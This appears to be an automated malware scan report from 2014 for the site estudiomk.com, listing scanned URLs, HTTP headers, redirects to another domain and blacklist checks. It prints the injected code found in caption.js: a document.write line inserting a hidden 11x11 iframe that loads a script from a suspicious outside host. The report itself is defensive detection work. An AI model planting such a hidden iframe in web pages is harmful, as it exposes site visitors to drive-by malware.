Scanned pages/files
Request | Server response | Status |
http://estudiomk.com/ | HTTP/1.1 200 OK Connection: close Date: Wed, 25 Jun 2014 13:41:15 GMT Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://estudiomk.com/?_fb_noscript=1 | HTTP/1.1 200 OK Connection: close Date: Wed, 25 Jun 2014 13:41:16 GMT Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 4275 Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://estudiomk.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:17 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://atlanticpurchasing.com/ | 200 OK Content-Length: 8418 Content-Type: text/html | clean |
http://atlanticpurchasing.com/plugins/system/jcemediabox/js/mediaobject.js?v=105 | 200 OK Content-Length: 2850 Content-Type: application/x-javascript | clean |
http://estudiomk.com/plugins/system/jcemediabox/js/jcemediabox.js?v=105 | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:24 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://atlanticpurchasing.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://estudiomk.com/plugins/system/jcemediabox/addons/default.js?v=105 | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:25 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://estudiomk.com/plugins/system/jcemediabox/addons/twitter.js?v=105 | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:26 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://estudiomk.com/media/system/js/caption.js | 200 OK Content-Length: 2127 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1024 bytes skipped]... container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe src="http://jlhsyytr.pcanywhere.net/valcunatrop.cgi?6" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 11x11 src: http://jlhsyytr.pcanywhere.net/valcunatrop.cgi?6 This URL is marked by Google as suspicious <iframe src="http://jlhsyytr.pcanywhere.net/valcunatrop.cgi?6" scrolling="auto" frameborder="no" align="center" height="11" width="11"> | ||
http://estudiomk.com/modules/mod_ariextmenu/mod_ariextmenu/js/ext-core.js | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:27 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://estudiomk.com/modules/mod_ariextmenu/mod_ariextmenu/js/menu.min.js | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:28 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://estudiomk.com/modules/mod_roknavmenu/themes/fusion/js/sfhover-ie.js | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:28 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://estudiomk.com/modules/mod_roknavmenu/themes/fusion/js/fusion.js | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:29 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://estudiomk.com/modules/mod_flashmod/mod_flashmod.js | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:29 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: estudiomk.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Jun 2014 13:41:15 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: estudiomk.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Jun 2014 13:41:15 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: estudiomk.com
Referer: http://www.google.com/search?q=estudiomk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: estudiomk.com
Referer: http://www.google.com/search?q=estudiomk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=estudiomk.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://estudiomk.com/
Result: estudiomk.com is not infected or malware details are not published yet.
Result: estudiomk.com is not infected or malware details are not published yet.